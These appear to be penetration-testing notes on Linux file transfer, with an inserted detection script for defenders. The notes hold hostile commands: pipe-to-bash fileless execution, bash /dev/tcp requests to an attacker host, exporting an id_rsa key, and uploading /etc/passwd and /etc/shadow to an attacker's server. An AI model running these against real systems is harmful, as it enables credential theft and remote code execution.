Linux File Transfer
Although Linux can communicate via FTP and SMB like Windows, most malware on all operating systems uses HTTP and HTTPS for communication.
Table of Contents
- Base64 Copy and Paste
- Wget and cURL
- Fileless attacks
- Bash Downloads
- SSH/SCP Downloads
- Uploads
- Different ways of creating web servers in Linux
Base64 Copy and Paste
check hash
md5sum id_rsa
encode
cat id_rsa |base64 -w 0;echo
decode on target machine
echo -n 'the base64 string' | base64 -d > id_rsa
confirm hash
md5sum id_rsa
Wget and cURL
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
from our attacking machine to the target
start server on our end
python3 -m http.server
request on target machine
wget http://10.10.15.142:8000/logrotate.c -O logrotate.c
Fileless attacks
a pipe lets us execute a file without saving it to disk first
bash script
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
python script
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3
Bash Downloads
with bash version >= 2.04, use the built-in /dev/tcp device file
on the attacking machine, set up a listening server
python3 -m http.server 80
connect to target web server
exec 3<>/dev/tcp/ATTACKING_MACHINE_IP/80
HTTP get request
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
print the response
cat <&3
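Added example (not part of the original notes): a small triage script that labels command lines matching the Base64 copy and paste, fileless pipe and /dev/tcp techniques above, for use over shell history or execve audit records. The function names and rule labels are assumptions, and the sample input is constructed from the commands shown in these notes.

```sh
#!/bin/sh
# Added example, not from the original notes. Rule names are assumptions.

classify_cmdline() {
    # $1 = one command line, e.g. from shell history or an execve audit record
    if printf '%s\n' "$1" | grep -Eq '(curl|wget)[[:space:]][^|]*[|][[:space:]]*(sudo[[:space:]]+)?(bash|sh|python[0-9.]*|perl)([[:space:]]|$)'; then
        echo "pipe-to-interpreter"     # download streamed straight into an interpreter
    elif printf '%s\n' "$1" | grep -Eq '[<>][[:space:]]*/dev/tcp/[^/[:space:]]+/[0-9]+'; then
        echo "bash-dev-tcp"            # bash network redirection, no curl or wget involved
    elif printf '%s\n' "$1" | grep -Eq 'base64[[:space:]]+(-d|--decode)[^>]*>'; then
        echo "base64-decode-to-file"   # pasted blob rebuilt into a file
    else
        echo "none"
    fi
}

scan_cmdlines() {
    # Reads command lines on stdin; prints "label<TAB>line" for every match.
    while IFS= read -r line; do
        label=$(classify_cmdline "$line")
        [ "$label" = "none" ] || printf '%s\t%s\n' "$label" "$line"
    done
}

count_hits() {
    # Number of flagged command lines on stdin.
    scan_cmdlines | wc -l | tr -d ' '
}

sample_cmdlines() {
    # Constructed sample: four commands from these notes plus two benign lines.
    cat <<'EOF'
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3
exec 3<>/dev/tcp/ATTACKING_MACHINE_IP/80
echo -n 'the base64 string' | base64 -d > id_rsa
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
cat notes.txt | grep bash
EOF
}

sample_cmdlines | scan_cmdlines
```

The rules only see the command line as it was logged, so treat hits as triage leads rather than a complete detection.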
SSH/SCP Downloads
set up SSH server on attacking machine
sudo systemctl enable ssh
sudo systemctl start ssh
netstat -lnpt
Download the file on target machine
scp plaintext@192.168.49.128:/root/myroot.txt .
Note: You can create a temporary user account for file transfers and avoid using your primary credentials or keys on a remote computer.
Python Web Uploads
on the attacking machine, install the upload server
python3 -m pip install uploadserver
create a self-signed certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
start web server
mkdir https && cd https
python3 -m uploadserver 443 --server-certificate /home/mont/Desktop/server.pem
from the target machine, upload to the listening server
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
SCP Uploads
set up SSH server on target machine
sudo systemctl enable ssh
sudo systemctl start ssh
netstat -lnpt
Download the file on attacking machine
scp plaintext@192.168.49.128:/root/myroot.txt .
Different ways of creating web servers in Linux
python3
python3 -m http.server
python2.7
python2.7 -m SimpleHTTPServer
php
php -S 0.0.0.0:8000
ruby
ruby -run -ehttpd . -p8000
download
wget 192.168.49.128:8000/filetotransfer.txt